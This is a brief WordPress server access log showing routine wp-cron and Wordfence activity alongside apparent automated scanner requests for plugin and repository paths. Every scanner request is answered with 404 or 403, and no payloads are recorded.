103.4.122.14 - - [13/Jan/2026:17:42:33 +0800] "POST /?wordfence_syncAttackData=1768297353.5612 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:42:31 +0800] "GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:43:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768297435.6923639774322509765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:43:52 +0800] "POST /service/rapture/session HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:44:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768297442.4419291019439697265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:43:59 +0800] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:17:44:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768297467.7430629730224609375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:44:24 +0800] "POST /mailingupgrade.php HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
103.4.122.14 - - [13/Jan/2026:17:45:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768297526.7432971000671386718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:45:23 +0800] "POST /context.json HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:17:46:00 +0800] "POST / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
103.4.122.14 - - [13/Jan/2026:17:46:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768297579.7716720104217529296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
